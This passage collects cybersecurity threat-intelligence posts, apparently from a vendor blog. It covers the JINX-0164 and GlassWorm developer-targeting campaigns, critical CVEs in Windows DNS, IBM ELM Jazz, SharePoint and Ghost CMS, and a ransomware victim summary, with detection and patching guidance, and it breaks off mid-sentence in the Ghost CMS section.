JINX-0164, a previously untracked financially motivated threat actor, targets cryptocurrency organizations and their developers with custom macOS malware and social engineering. Wiz CIRT and Wiz Research have detailed JINX-0164's operations, active since at least mid-2025. The group's campaigns use convincing LinkedIn profiles for initial contact, often masquerading as recruiters offering virtual meetings, to lure victims into downloading malicious files. The attack chain typically begins with social engineering via LinkedIn, where the threat actor impersonates business partners or recruiters to propose virtual meetings. These invitations link to malicious domains disguised as legitimate teleconferencing platforms, like Microsoft Teams. Upon clicking the link, the victim unknowingly downloads and executes AUDIOFIX. This Python-based macOS infostealer and remote access tool (RAT) is delivered via a bash script hosted on a fake driver store domain such as apple.driver-store[.]com. The payload, often named ChromeUpdater, masquerades as a system audio driver (coreaudiod) and achieves persistence via launchctl. Once AUDIOFIX gains control, it harvests many credentials and sensitive data. This includes information from macOS Keychain files, browser-stored credentials from seven different browsers, local admin credentials, SSH keys, and configuration files. The malware targets 51 cryptocurrency wallet browser extensions, including MetaMask, Phantom, Coinbase Wallet, and Binance Chain, plus two desktop wallet applications. The threat actor also hijacks active sessions from communication applications such as Discord, Slack, and Telegram. It exfiltrates cloud infrastructure secrets like AWS, GCP, and Azure keys, and Cloudflare API tokens. JINX-0164 demonstrated lateral movement capabilities by injecting AUDIOFIX into internal code repositories after compromising a developer's endpoint. They employed deceptive Git tactics, such as modifying committer names to impersonate other developers, pushing malicious code directly to main branches in unprotected repositories, or inserting payloads into existing branches. This tactic turned the organization's development infrastructure into a propagation vector, infecting additional machines when employees updated their code. In one instance, GitHub's Vigilant Mode detected unverified commits, which revealed the impersonation and allowed intervention. Beyond direct developer targeting, JINX-0164 has also conducted supply chain operations. On April 7, 2026, the group trojanized version 4.9.1 of the npm package @velora-dex/sdk. This malicious package appended code to dist/index.js that downloaded MINIRAT, a lightweight Go-based backdoor, whenever the package was imported. MINIRAT performs basic system reconnaissance and establishes persistence. It also offers fundamental backdoor functionality to upload, download, and execute shell commands. The threat actor masks their cloud activity and C2 communications by routing connections through VPN services such as Mullvad VPN, Astrill VPN, and Express VPN. What Disruptions Hit the GlassWorm Developer Supply Chain Campaign? A coordinated takedown by CrowdStrike, Google, and the Shadowserver Foundation disrupted all four command-and-control (C2) channels associated with the GlassWorm malware campaign. This collaborative effort neutralized the strong infrastructure that supported a persistent software supply chain attack targeting software developers since at least early 2025. The campaign poisoned over 300 GitHub repositories, using compromised developer credentials for broader impact. GlassWorm operators systematically targeted software developers, recognized for their access to critical assets such as source code repositories, cloud platforms, CI/CD pipelines, and package registries. The campaign used several approaches, including trojanized VS Code extensions published on both the Microsoft VS Code Marketplace and Open VSX. This allowed them to target users of VS Code forks like Cursor, Positron, Windsurf, and VSCodium. Malicious code was also introduced through compromised npm and Python packages, significantly expanding the attack surface. The primary objective of the GlassWorm campaign was to deliver a data-theft framework. This framework incorporated capabilities for credential harvesting, cryptocurrency wallet exfiltration, and system profiling. Subsequent iterations of GlassWorm deployed a Websocket-based JavaScript RAT known as GlassWormRAT. This RAT was designed to steal web browser data. It could install a Google Chrome extension to collect sensitive information, including screenshots, keystrokes, and clipboard content from infected systems. The malware also converted infected hosts into covert infrastructure, acting as SOCKS proxies, hidden VNC (HVNC) servers, and remote execution nodes. A key characteristic of the GlassWorm operation was its strong C2 infrastructure, comprising four distinct channels designed to withstand takedown attempts. These channels included using the Solana blockchain as a dead drop resolver, storing C2 server addresses in the memo fields of blockchain transactions. The malware also queried the BitTorrent Distributed Hash Table (DHT) peer-to-peer network for configuration data. Google Calendar also served as a dead drop resolver, fetching C2 server addresses from event titles. Direct connections to C2 infrastructure hosted on commercial VPS providers completed the quartet of communication channels. The coordinated takedown simultaneously neutralized all four C2 channels, preventing infected machines from receiving new instructions or payloads. CrowdStrike attributed the GlassWorm activity to likely Russia-based cybercriminals, citing the malware's termination of execution on systems located in Commonwealth of Independent States (CIS) countries and Russian-language comments within the code. The disruption shows the ongoing challenge of securing the software supply chain against well-resourced and persistent adversaries. Is a Critical RCE Vulnerability Affecting Windows DNS Clients Actively Exploited? A critical Remote Code Execution (RCE) vulnerability affecting the Windows DNS Client, with a CVSS score of 9.8, now has a publicly disclosed proof-of-concept (PoC) exploit. While specific details on active exploitation are not provided, the public release of a PoC escalates the risk to affected systems. Such vulnerabilities, especially those with a critical CVSS rating and public PoC, are frequently adopted by threat actors for widespread exploitation. The vulnerability involves a heap overflow within the Windows DNS Client component. A heap overflow condition can enable an attacker to overwrite adjacent memory, which can lead to arbitrary code execution with the privileges of the affected service or user. Given the pervasive nature of DNS Client functionality in Windows environments, successful exploitation could lead to system compromise. The absence of detailed exploitation specifics does not diminish the severity. The prompt availability of a PoC typically lowers the barrier for attackers to develop reliable exploits, increasing the urgency for patch deployment and mitigation. Organizations using Windows DNS Client across their infrastructure face an immediate threat from opportunistic and targeted attacks using this flaw. Technical Takeaways AI has significantly shortened exploit development time for known CVEs from 125.3 days to 0.5 days, changing the speed of threat emergence. Traditional vulnerability scanners and their detection signatures frequently lag behind AI-driven exploit generation, creating "visibility gaps" for over 83% of critical vulnerabilities. Financially motivated threat actor JINX-0164 employs LinkedIn social engineering, custom macOS malware (AUDIOFIX, MINIRAT), and CI/CD pipeline hijacking to target cryptocurrency organizations and developers. The GlassWorm malware campaign, which poisoned over 300 GitHub repositories, used strong C2 infrastructure across the Solana blockchain, BitTorrent DHT, and Google Calendar before its disruption. A critical RCE vulnerability (CVSS 9.8) in the Windows DNS Client now has a public PoC, requiring immediate attention for patching and mitigation due to its potential for widespread impact. --- ## IBM ELM Jazz CVE-2026-3660 (CVSS 9.8) Auth Bypass - URL: https://purple-ops.io/blog/ibm-elm-jazz-cve-2026-3660 - Date: 2026-05-28 - Category: CVE Analysis - Tags: ibm-elm, jazz-foundation, cve-2026-3660, authentication-bypass, critical-vulnerability - Reading time: 5 min | CVSS: 9.8 **Summary:** IBM ELM Jazz Foundation CVE-2026-3660, a critical authentication bypass with CVSS 9.8, enables unauthenticated remote attackers to gain unauthorized access. IBM ELM Jazz CVE-2026-3660 (CVSS 9.8) Auth Bypass IBM has issued a security bulletin addressing a critical authentication bypass vulnerability, designated CVE-2026-3660, within its Engineering Lifecycle Management (ELM) - Jazz Foundation. This flaw carries a maximum CVSSv3.1 score of 9.8, categorizing it as critical. The vulnerability allows an unauthenticated remote attacker to gain unauthorized access by manipulating server property files. The security defect stems from incorrect authorization logic within the software's core identity layer, enabling adversaries to bypass standard authentication checks. This bypass facilitates unauthorized modification of configuration files, potentially leading to compromise of active corporate application deployments. While the vendor has released full iFix updates to fix the vulnerability, the potential for severe impact on intellectual property and development lifecycles requires organizations to act immediately. The remote and unauthenticated nature of this exploit pathway makes it urgent for administrators to deploy the recommended patches. What is CVE-2026-3660 and why is it critical? CVE-2026-3660 is an authentication bypass vulnerability affecting IBM Engineering Lifecycle Management - Jazz Foundation, stemming from incorrect authorization logic. It is rated with a CVSSv3.1 score of 9.8, indicating a critical severity due to its significant impact and ease of exploitation. This vulnerability specifically allows an unauthenticated remote attacker to update server property files, subsequently enabling unauthorized access to the application. The criticality of CVE-2026-3660 arises from its potential to allow threat actors to circumvent foundational security controls without any prior authentication or user interaction. In an engineering platform like IBM ELM - Jazz Foundation, unauthorized access translates directly into significant risks for intellectual property, product designs, and the integrity of ongoing development lifecycles. An attacker using this flaw could view proprietary information, alter critical configurations, or potentially disrupt development processes, making its remediation an immediate priority for all affected deployments. Impact An attacker successfully exploiting CVE-2026-3660 can achieve unauthorized access to the IBM Engineering Lifecycle Management (ELM) application. This access is gained by altering server property files without requiring any authentication or user interaction. The primary risk lies in the compromise of an organization's intellectual property and the integrity of its engineering and development processes. Organizations utilizing the IBM Jazz Foundation as a core component of their engineering solutions are at risk. Attackers could view sensitive product designs, manipulate active development lifecycles, or gain insights into proprietary information. Such unauthorized access can lead to intellectual property theft, operational disruption, and potential supply chain vulnerabilities if compromised systems are used in broader development pipelines. The ability to hijack user sessions silently after altering configuration files amplifies the risk, making the scope of potential damage extensive. This kind of authentication bypass poses a direct threat to the confidentiality, integrity, and availability of critical enterprise assets. Exploitation chain The exploitation chain for CVE-2026-3660 begins with an unauthenticated remote attacker. The core vulnerability is an issue of incorrect authorization logic within the IBM Jazz Foundation framework. Specifically, the software's identity layer fails to properly validate changes to its configuration files. The attack vector is entirely remote, requiring no local access or prior privileges on the part of the attacker. There is also no user interaction required from a legitimate user for the exploit to succeed. The attacker directly targets the server, using the flaw where configuration files lack proper validation. By exploiting this weakness, adversaries can alter specific server property files. This modification then enables them to bypass standard authentication mechanisms and gain unauthorized access to the application, effectively hijacking user sessions or establishing persistent access. There is no information in the provided research about a publicly available Proof of Concept (PoC) exploit or active exploitation in the wild for CVE-2026-3660 specifically, though the nature of the flaw indicates it is readily exploitable. Organizations should consider similar authentication bypass vulnerabilities, such as those discussed in our prior analysis of a critical RCE flaw in IBM WebSphere, which also show the severe consequences of identity-related vulnerabilities. Affected products and versions The critical authentication bypass vulnerability, CVE-2026-3660, impacts specific releases of the IBM Engineering Lifecycle Management - Jazz Foundation product line. Organizations running these versions are strongly advised to apply the necessary updates immediately to mitigate the risk of exploitation. The affected product and version ranges are as follows: IBM Engineering Lifecycle Management - Jazz Foundation versions: 7.0.3 through iFix021 7.1.0 through iFix009 7.2.0 through iFix001 Newer installations or systems that have been fully patched beyond these specified iFix levels are not vulnerable to this particular flaw. Administrators should verify their current installed versions against these ranges to determine exposure. Detection Given the nature of CVE-2026-3660 as an authentication bypass achieved by altering server property files, detection efforts should focus on identifying anomalous access patterns, unauthorized modifications to critical system files, and suspicious authentication attempts. While the provided research does not detail specific Indicators of Compromise (IOCs) or EDR queries, general principles of security monitoring can be applied. Detection strategies should include: Log Monitoring: Regularly review application, authentication, and system logs for unusual activity. Look for: Unauthenticated access attempts to sensitive administrative interfaces or configuration endpoints. Log entries indicating modification of server property files (e.g., teamserver.properties, server.startup, or other core configuration files) by unauthorized users or processes. Successful logins by accounts that do not correspond to legitimate user activity or without proper authentication events preceding them. Errors related to authorization or authentication that might precede a successful bypass attempt. File Integrity Monitoring (FIM): Implement FIM on critical IBM Jazz Foundation server directories, especially those containing configuration and property files. FIM tools can alert administrators to any unauthorized changes to these files, which is the core mechanism of this exploitation. Network Monitoring: Observe network traffic for unusual connections to the IBM Jazz Foundation server from unknown or untrusted IP addresses. While the exploit itself modifies internal files, the initial access would traverse the network. EDR/XDR Solutions: Configure Endpoint Detection and Response (EDR) or Extended Detection and Response (XDR) solutions to flag suspicious process activity originating from the IBM Jazz Foundation application. This includes processes attempting to modify configuration files outside of standard administrative tools or scheduled updates. Organizations should also correlate these observations with threat intelligence sources that might release specific IOCs if CVE-2026-3660 is found to be actively exploited in the future. Proactive monitoring of such events can provide early warning of potential compromise, much like the methods applicable for detecting other critical authentication bypasses, as explored in our article on CVE-2026-20182 impacting Cisco SD-WAN. Remediation IBM has released full iFix updates to fix the threat from CVE-2026-3660. Immediate application of these patches is the primary and most effective remediation strategy. The following steps outline the required remediation and mitigation actions: Patching: Administrators using IBM Engineering Lifecycle Management - Jazz Foundation version 7.0.3 must immediately upgrade their installations to iFix022 or later. For deployments running version 7.1.0, the mandatory upgrade is to iFix010 or later. For version 7.2.0, administrators must install iFix002 or later. The latest iFix releases encompass all prior fixes and are designed to address the incorrect authorization logic that allows for the authentication bypass. Detailed upgrade instructions and access to the iFix packages are typically available through the official IBM Support portal. Workarounds: The provided research does not specify any effective workarounds for this critical vulnerability that would eliminate the need for patching. Due to the fundamental nature of the authorization flaw, a patch is the only definitive resolution. However, if immediate patching is not feasible, organizations should consider implementing temporary network-level restrictions to limit access to the IBM Jazz Foundation application to only trusted internal networks or specific IP ranges. This is a partial mitigation and does not fully secure the underlying vulnerability. Continuous Monitoring: After applying patches, maintain enhanced monitoring for any unusual activity as described in the detection section. This includes ongoing log analysis and file integrity monitoring to confirm that the vulnerability is no longer exploitable and that no residual compromise exists. Failing to apply these updates leaves company assets exposed to unauthorized access, potentially impacting intellectual property and the integrity of development lifecycles. Technical Takeaways CVE-2026-3660 is a critical authentication bypass vulnerability in IBM Engineering Lifecycle Management - Jazz Foundation, assigned a CVSSv3.1 score of 9.8. The flaw originates from incorrect authorization logic, allowing an unauthenticated remote attacker to modify server property files. Exploitation requires no user interaction or prior privileges, facilitating direct unauthorized access to the application. Affected versions include 7.0.3 through iFix021, 7.1.0 through iFix009, and 7.2.0 through iFix001. IBM has provided specific iFix updates (iFix022 for 7.0.3, iFix010 for 7.1.0, iFix002 for 7.2.0) as the definitive remediation. --- ## DragonForce Ransomware 19 Real Estate Healthcare Victims - URL: https://purple-ops.io/blog/dragonforce-ransomware-real-estate-healthcare - Date: 2026-05-27 - Category: Ransomware Report - Tags: dragonforce-ransomware, real-estate, healthcare, ransomware-activity, threat-intelligence - Reading time: 5 min **Summary:** DragonForce ransomware claimed 19 victims in the Real Estate and Healthcare sectors this period, highlighting ongoing threats. DragonForce Ransomware 19 Real Estate Healthcare Victims Statistical Overview Victim Totals This month: 689 This quarter: 1467 Year to date: 4092 Last 24h: 36 Quarterly Breakdown Q1: 2631 | Q2: 1467 | Q3: 0 | Q4: 0 Ransomware activity shows consistent levels this quarter, with DragonForce being a contributor in this period. The sustained victim count shows threat actors continue operating across diverse sectors. Introduction In the last 24 hours, 36 new ransomware victims have been reported. DragonForce was the most active group, accounting for over half of these incidents, followed by 0day-syndicate. Primary affected sectors include Real Estate, Healthcare, and Technology, with a significant concentration of incidents observed in the United States and the Netherlands. Ransomware Summary Table #GroupVictims (24h)Sample VictimsGeosSectors 1DragonForce19Delbrook capital advisors, Dentonfirm.com, Duboisag.com (+16)Netherlands, United StatesReal Estate, Healthcare 20day-syndicate4Dxon.com.br, Gokids gokidspublishing.com dev.redpilotstudio.com gokidsmobile.com, Xgenize.com (+1)Brazil, NigeriaTechnology / Software, Professional Services 3Medusa Locker3Baeaoai, Baeaxai, BakaxahNone, United StatesTechnology / Software, Manufacturing 4Akira2Gone fishin' marine, Northwest woodworksUnited StatesConstruction & Engineering, Retail & Ecommerce 5Space Bears2Gestordes, Ridge law firmSpain, United StatesLegal, Professional Services 6Anubis1Exceed energyUnited KingdomEnergy & Utilities 7Doommageddon1InnovanoIndiaTechnology / Software 8INC Ransom1Distrigaz Vest S.A.RomaniaEnergy & Utilities 9M3RXDLS1Jichasa.comMexicoTransportation & Logistics 10Nova (RALord)1Textile testing services of americaMexicoProfessional Services 11The Gentelman1TechmarNetherlandsConstruction & Engineering DragonForce was the most active in ransomware activity during this period, claiming 19 victims primarily in the Real Estate and Healthcare sectors across the United States and Netherlands. Other active groups, including 0day-syndicate, Medusa Locker, and Akira, contributed to a diverse range of victims spanning Technology, Professional Services, and Manufacturing. INC Ransom targeted Distrigaz Vest S.A. in Romania, showing a continued threat to critical infrastructure within the Energy & Utilities sector. For more on DragonForce's operations and targeting profiles, see our recent analysis. Victim Distribution By Country United States: 13 United Kingdom: 4 Netherlands: 3 None: 3 Mexico: 2 Canada: 2 Spain: 1 Romania: 1 Brazil: 1 Germany: 1 By Industry Legal Services: 2 Construction: 2 Accounting: 1 Natural Gas Distribution: 1 Manufacturing: 1 Oil and Gas: 1 Staffing and Recruiting: 1 Telecommunications and Traffic Management: 1 Architectural Services: 1 Architecture and Planning: 1 The United States remains the most targeted country, followed by the United Kingdom and the Netherlands. Industry targeting is diversified, with significant activity across professional services like Legal and Accounting, as well as critical sectors such as Natural Gas Distribution and Oil and Gas. More information on ransomware group activity, including Medusa Locker and Akira, is in recent threat intelligence updates. Ransomware News Topline Ransomware developments include warnings of in-person data theft tactics by the Silent Ransom Group, reported ransomware incidents affecting municipalities, a Qilin group victim claim, and new cryptojacking campaigns using AI chatbots. Campaigns & Operations The FBI issued a warning regarding the Silent Ransom Group (SRG), also known as Luna Moth, Chatty Spider, and UNC3753, for an extortion scheme targeting U.S. law firms. This scheme combines social engineering tactics, such as posing as IT support for remote access, with a fallback of actors physically inserting USB drives to exfiltrate data. Incidents include a ransomware attack on Casalp's Livorno operations in Italy on May 11, 2026, and a partial compromise of Nandrin Municipality's IT infrastructure in Belgium around March 15, 2026. The Qilin ransomware group also named New Zealand's Alpha Group Holdings as a victim, providing limited incident details. Analysis of the wider ransomware field and quarterly trends is in our recent activity updates. Vulnerabilities & TTPs SRG's tactics involve impersonating IT personnel via phone, email, or live chat to gain initial access, then escalating privileges to deploy ransomware or exfiltrate data for double extortion, often blending with legitimate IT workflows. Separately, an active cryptojacking campaign is using AI chatbot interactions and SEO poisoning to redirect users to attacker-controlled download sites, delivering a rogue DLL via a packed ScreenConnect installer to establish persistence and run miners while bypassing Microsoft Defender. Analyst Note These events show the threat environment is changing, marked by sophisticated social engineering, persistent infrastructure targeting, and the exploitation of emerging technologies and search vectors for malicious purposes. Technical Takeaways DragonForce led reported ransomware activity this period, affecting mainly Real Estate and Healthcare sectors. The United States remains the most frequent target country, with a broad distribution of victim industries. The Silent Ransom Group (SRG) uses a varied extortion approach, blending social engineering with potential physical access to victim networks for data exfiltration. Emerging attack vectors include cryptojacking campaigns that manipulate AI chatbot recommendations and search engine optimization to distribute malware. Critical infrastructure entities, such as Distrigaz Vest S.A., continue to be targeted by ransomware groups like INC Ransom. --- ## SharePoint Server CVE-2026-45659 RCE (CVSS 8.8) - URL: https://purple-ops.io/blog/sharepoint-server-cve-2026-45659-rce - Date: 2026-05-27 - Category: CVE Analysis - Tags: none - Reading time: 9 min | CVSS: 8.8 **Summary:** Microsoft SharePoint Server CVE-2026-45659 is a critical RCE vulnerability scoring CVSS 8.8. Learn the risks, affected versions, and how to patch now. SharePoint Server CVE-2026-45659 RCE (CVSS 8.8) Microsoft has released an out-of-band patch addressing CVE-2026-45659, a critical remote code execution (RCE) vulnerability affecting SharePoint Server. This flaw, stemming from the deserialization of untrusted data, carries a CVSS score of 8.8, indicating high severity and potential for significant impact. An authenticated attacker, requiring only minimal privileges such as Site Member permissions, can exploit CVE-2026-45659 remotely. Although Microsoft initially described exploitation as "less likely," the company's decision to issue an immediate, out-of-band patch outside of its regular Patch Tuesday cycle confirms the perceived significant risk associated with this vulnerability. As of the current reporting, no public exploit code has surfaced, nor has there been any indication of in-the-wild exploitation. However, the history of SharePoint Server as a high-value target for cyber adversaries, coupled with the rapid development of proof-of-concept (PoC) exploits for similar disclosures, requires immediate attention to patching by affected organizations. What is CVE-2026-45659 and why is it critical? CVE-2026-45659 is a remote code execution vulnerability in Microsoft SharePoint Server that carries a CVSS score of 8.8. This vulnerability is classified as critical due to its potential to allow an authenticated attacker to execute arbitrary code on the affected server. The flaw specifically involves the deserialization of untrusted data, a well-documented vulnerability class. When an application deserializes data without proper validation, it can be tricked into interpreting malicious input as executable code or commands, leading to full compromise of the server. The criticality of CVE-2026-45659 is amplified by several factors despite Microsoft's initial assessment of "less likely to exploit." These include low attack complexity, a lack of user interaction required for successful exploitation, and the minimal privileges (Site Member permissions) needed by an attacker. The combination of these attributes significantly lowers the barrier for a potential attacker. Microsoft's proactive release of an out-of-band patch, rather than waiting for scheduled updates, further shows the urgency and severity the vendor attributes to this vulnerability. For a review of similar critical SharePoint vulnerabilities, refer to our prior analysis of a critical RCE vulnerability in Microsoft SharePoint Server. Impact of CVE-2026-45659 A successful exploitation of CVE-2026-45659 could have a high impact on the confidentiality, integrity, and availability of the affected SharePoint Server system. An authenticated attacker who achieves remote code execution can potentially gain full control over the server. This level of compromise enables various malicious activities, ranging from data exfiltration to the deployment of further malicious payloads. The confidentiality of sensitive documents, project data, employee records, and intellectual property stored within SharePoint environments could be severely compromised. The integrity of these same data sets and the server's operational state could be altered or corrupted, while availability could be disrupted through denial-of-service or ransomware attacks. SharePoint Server installations, particularly on-premises deployments, represent high-value targets for cyber adversaries. These platforms frequently serve as central repositories for vast amounts of critical enterprise data, making them attractive for both intellectual property theft and financial extortion. The extensive integration of SharePoint with other crucial Microsoft services, such as Active Directory, Teams, and Outlook, means a successful breach often provides a strategic beachhead for lateral movement across an entire enterprise network. This expands the potential blast radius of an exploit far beyond the initial SharePoint Server. Our prior insights into a SharePoint zero-day vulnerability and critical mitigation steps further illustrate the persistent threats surrounding this product. Historically, SharePoint vulnerabilities have been actively exploited by sophisticated threat actors. China-linked groups, including Linen Typhoon and Violet Typhoon, have used SharePoint flaws for intellectual property theft, showing the strategic value of compromised SharePoint environments. Ransomware operators, such as Storm-2603, have also exploited these vulnerabilities to deploy extortion campaigns, demonstrating the direct financial motivations behind such attacks. In July 2025, a critical zero-day vulnerability chain, dubbed ToolShell, was actively exploited against on-premises SharePoint deployments. These attacks targeted various sectors, including government agencies, universities, corporations, and even the US Nuclear Weapons Agency, emphasizing the severe real-world implications of SharePoint vulnerabilities. APT groups and financially motivated cybercriminals consistently target on-premises Microsoft SharePoint environments. This is largely due to the challenges organizations face in maintaining fully patched, properly configured, and consistently monitored systems. Legacy integrations, outdated software, and excessive privileges often present exploitable security gaps. For additional context on another critical SharePoint vulnerability, consider reviewing our post on CVE-2026-32201, a SharePoint spoofing vulnerability that also required urgent patching. Exploitation Chain of CVE-2026-45659 The exploitation chain for CVE-2026-45659 begins with an authenticated attacker possessing a minimum of Site Member permissions on the target SharePoint Server. This initial authentication requirement differentiates it from unauthenticated vulnerabilities but does not make it significantly more difficult for a determined attacker, given that internal or compromised credentials can satisfy this precondition. The attack vector is network-based, implying that the vulnerability can be triggered over the network without direct physical access to the server. The core of the vulnerability lies in the deserialization of untrusted data within Microsoft Office SharePoint. Deserialization is the process of converting a stream of bytes back into an object in memory. Insecure deserialization occurs when an application deserializes data from an untrusted source without verifying its integrity or authenticity. An attacker can craft a malicious serialized data payload that, when processed by the vulnerable SharePoint component, leads to arbitrary code execution. This malicious payload effectively "tricks" Microsoft SharePoint into executing code that the attacker specifies, enabling them to remotely run commands on the underlying server. Microsoft has characterized the attack complexity as low. This assessment indicates that an attacker does not require extensive prior knowledge of the system's intricate workings or highly specialized skills to devise an effective exploit. The vulnerability does not require user interaction, meaning a user does not need to click a malicious link, open a file, or perform any specific action for the exploit to succeed once the malicious payload is delivered to the vulnerable component. The low privileges required also contribute to easier exploitation, as an attacker does not need to escalate privileges to administrative levels to initiate the attack. These factors allow for repeatable success with the payload against the vulnerable component. This makes CVE-2026-45659 a significant threat despite the lack of public exploitation reports to date. The bug's discovery is attributed to a security researcher operating under the name MEOW. Which products are affected by CVE-2026-45659? CVE-2026-45659 specifically affects Microsoft SharePoint Server. The research findings indicate that the vulnerability is present in general "SharePoint Server" environments, with particular emphasis on "on-premises SharePoint deployments." The provided research does not specify particular version numbers or cumulative updates that are affected by CVE-2026-45659. Organizations should refer to the official Microsoft Security Response Center (MSRC) update guide for CVE-2026-45659 to identify the exact product versions and updates that mitigate this vulnerability. The broad mention of SharePoint Server implies that multiple versions or configurations of the on-premises product could be at risk. Detection for CVE-2026-45659 The research findings do not provide specific detection guidance such as log signatures, Indicators of Compromise (IOCs), EDR queries, or network indicators tailored to CVE-2026-45659. Due to the nature of remote code execution vulnerabilities, detection typically relies on monitoring for anomalous process creation, unusual network connections originating from the SharePoint Server, or suspicious file modifications. Organizations should implement full logging and monitoring solutions for their SharePoint Server environments. This includes: System and Application Event Logs: Scrutinize SharePoint ULS logs, Windows Event Logs (System, Security, Application, and particularly PowerShell operational logs if PowerShell is used in exploits) for error messages, unexpected process creations, or unusual activity originating from the SharePoint service accounts. Network Traffic Analysis: Monitor network traffic to and from SharePoint Server for unusual protocols, connections to unknown external IP addresses, or large data transfers that could indicate data exfiltration. Endpoint Detection and Response (EDR) Systems: EDR solutions can help detect post-exploitation activities, such as suspicious command execution, unauthorized file access, or attempts at privilege escalation that might occur after successful RCE. File Integrity Monitoring (FIM): Implement FIM on critical SharePoint directories and configuration files to detect unauthorized changes that could indicate compromise. While direct IOCs are not available from the provided research, maintaining strong security monitoring practices on SharePoint Server instances is crucial for identifying potential exploitation attempts or post-exploitation activities related to CVE-2026-45659 or similar threats. Remediation for CVE-2026-45659 The primary and most critical remediation step for CVE-2026-45659 is the immediate application of the patch provided by Microsoft. Apply Microsoft's Out-of-Band Patch: Organizations operating SharePoint Server deployments should promptly deploy the out-of-band patch issued by Microsoft for CVE-2026-45659. This patch is specifically designed to address the deserialization of untrusted data vulnerability and prevent remote code execution. Administrators should consult the official Microsoft Security Response Center (MSRC) update guide for CVE-2026-45659 to obtain the correct security updates for their specific SharePoint Server versions and apply them without delay. Regular Patching and Update Management: Beyond this immediate patch, maintaining a consistent and timely patch management strategy for all SharePoint Server deployments is essential. This includes applying all subsequent monthly security updates to ensure continuous protection against newly discovered vulnerabilities. Security Configuration Review: Review and enforce least-privilege principles for all SharePoint user accounts and service accounts. Ensure that accounts, particularly those with Site Member permissions, are not over-privileged. Network Segmentation and Access Control: Isolate SharePoint Server instances within network segments to restrict unauthorized access. Implement strict network access controls to limit communication paths to and from the server to only those absolutely necessary for its function. Enhanced Monitoring: Implement and continuously review logs from SharePoint Server for any anomalous behavior. This includes monitoring for unexpected process executions, unusual network connections, or modifications to critical system files, which could indicate a successful exploit attempt or post-exploitation activity. Technical Takeaways CVE-2026-45659 is a critical Remote Code Execution (RCE) vulnerability in Microsoft SharePoint Server with a CVSS score of 8.8. The vulnerability is rooted in the insecure deserialization of untrusted data, enabling an authenticated attacker with Site Member permissions to execute arbitrary code remotely. Attack complexity for CVE-2026-45659 is low, requiring no user interaction and only minimal privileges, allowing repeatable exploitation against vulnerable components. Despite Microsoft's "less likely to exploit" assessment, an out-of-band patch was released, showing the vendor's perception of CVE-2026-45659 as a significant risk due to SharePoint's history as a high-value target for nation-state actors and ransomware groups. Immediate application of Microsoft's provided patch is the primary remediation; the research does not specify affected versions beyond general "SharePoint Server" or provide specific detection guidance. --- ## CVE-2026-26980: Ghost CMS SQL Injection (CVSS 9.4) - URL: https://purple-ops.io/blog/cve-2026-26980-ghost-sql-injection - Date: 2026-05-27 - Category: CVE Analysis - Tags: cve-2026-26980, ghost-cms, sql-injection, active-exploitation, clickfix - Reading time: 9 min | CVSS: 9.4 **Summary:** Ghost CMS CVE-2026-26980, a critical SQL injection (CVSS 9.4), is actively exploited to steal API keys and inject malware onto 700+ websites CVE-2026-26980 (CVSS 9.4) Ghost SQL Injection Actively Exploited Threat actors actively exploit CVE-2026-26980, a critical SQL injection vulnerability in Ghost CMS versions prior to 6.19.1. This vulnerability, with a CVSS score of 9.4, lets unauthenticated attackers read arbitrary data from the database, including administrative API keys. Its severity increases due to ongoing exploitation, first detected on May 7, 2026. Exploitation targets over 700 websites globally, in sectors like universities, blockchain, artificial intelligence, software-as-a-service (SaaS), security research, media, and financial technology. The campaign injects malicious JavaScript code into compromised Ghost CMS articles, which then redirects visitors through traffic distribution systems before delivering Windows malware. This analysis details CVE-2026-26980, its exploitation chain, and guidance for detection and remediation. Organizations using Ghost CMS should implement recommended patches and security measures to reduce exposure to these threats. Impact CVE-2026-26980 allows an unauthenticated attacker unauthorized data access, specifically targeting the Ghost CMS admin API key. With this key, threat actors gain the ability to directly modify articles published on the content management system, leading to widespread site poisoning. The primary objective observed is injecting malicious JavaScript loaders into compromised pages, which then starts ClickFix attacks. This campaign affects over 700 websites in sectors like universities, blockchain, artificial intelligence, SaaS, security research, media, and financial technology, where trust and data integrity are important. Compromised sites face immediate defacement and pose a significant risk to visitors. Users accessing infected pages are subjected to a multi-stage attack that begins with fake CAPTCHA verification, leading to malicious commands executing on their Windows systems. The outcome is the delivery of Windows executables designed for persistence and remote control. This turns legitimate web properties into channels for malware distribution. The compromise of reputable websites further increases the success rate of these attacks by using inherent user trust. How CVE-2026-26980 Facilitates Attacks CVE-2026-26980 is an SQL injection vulnerability in Ghost CMS's Content API. It is critical because it allows an unauthenticated attacker to read arbitrary data from the database. The initial step in the exploitation chain involves using this vulnerability to steal a target site's Admin API Key without authorization. This key is crucial because it grants control over the Ghost Admin API, enabling an attacker to perform actions typically reserved for legitimate administrators. After acquiring the Admin API Key, threat actors tamper with articles in bulk across the compromised Ghost CMS instance. This bulk modification injects malicious JavaScript loaders at the bottom of web pages. Our prior analysis of similar attack techniques, for example, our analysis of React2Shell CVEs and AI scams, shows the effectiveness of client-side script injection for initial compromise. The injected JavaScript acts as a two-stage loader, designed to retrieve the main payload from an external domain: clo4shara[.]xyz/11z77u3.php. This modular architecture allows attackers to dynamically change payloads while maintaining the loader across many compromised sites. For more on SQL injection vulnerabilities in content management systems, refer to our analysis of a Drupal SQL injection vulnerability. The external PHP script hosted on clo4shara[.]xyz functions as a traffic distribution system, powered by Adspect, a commercial cloaking service. This script collects user browser fingerprint information and uses cloaking techniques to differentiate legitimate victims from security scanners or crawlers. Only intended targets receive the actual malicious payload. The script supports 19 different commands, enabling the threat actor to execute arbitrary JavaScript code and maintain remote control over the victim's browser. Malicious JavaScript for payload delivery is a common technique, like those explored in our post on an Exchange Cross-Site Scripting (XSS) zero-day. Victims identified as targets see a fake CAPTCHA verification page within an iframe. This page lures users through social engineering, instructing them to copy and paste a Base64-encoded command into the Windows Run dialog. This command acts as a dropper, retrieving and extracting a ZIP archive. Inside the archive, a Windows batch script executes a PowerShell command. This PowerShell command downloads a DLL file from a remote domain and launches it using rundll32.exe. As a distraction, a bogus web page simultaneously opens for the user. Later versions of this attack have replaced the DLL payload with a JavaScript payload, but the goal remains dropping a Windows executable. The observed executables include a PuTTY client with a valid code-signing certificate or a modified Inno Setup installer for an Electron application. This application, a tampered version of the open-source Grape desktop client, achieves persistence and regularly polls a remote server, web-telegram[.]ug, every 30 seconds for further instructions, including executing additional JavaScript code or executable files. Which Ghost CMS Versions Are Affected? The CVE-2026-26980 vulnerability affects specific Ghost CMS versions. The security flaw was addressed in version 6.19.1. Affected product line: Ghost CMS Affected versions: All versions prior to 6.19.1 Organizations running any Ghost CMS instance older than 6.19.1 are vulnerable to this SQL injection and the associated 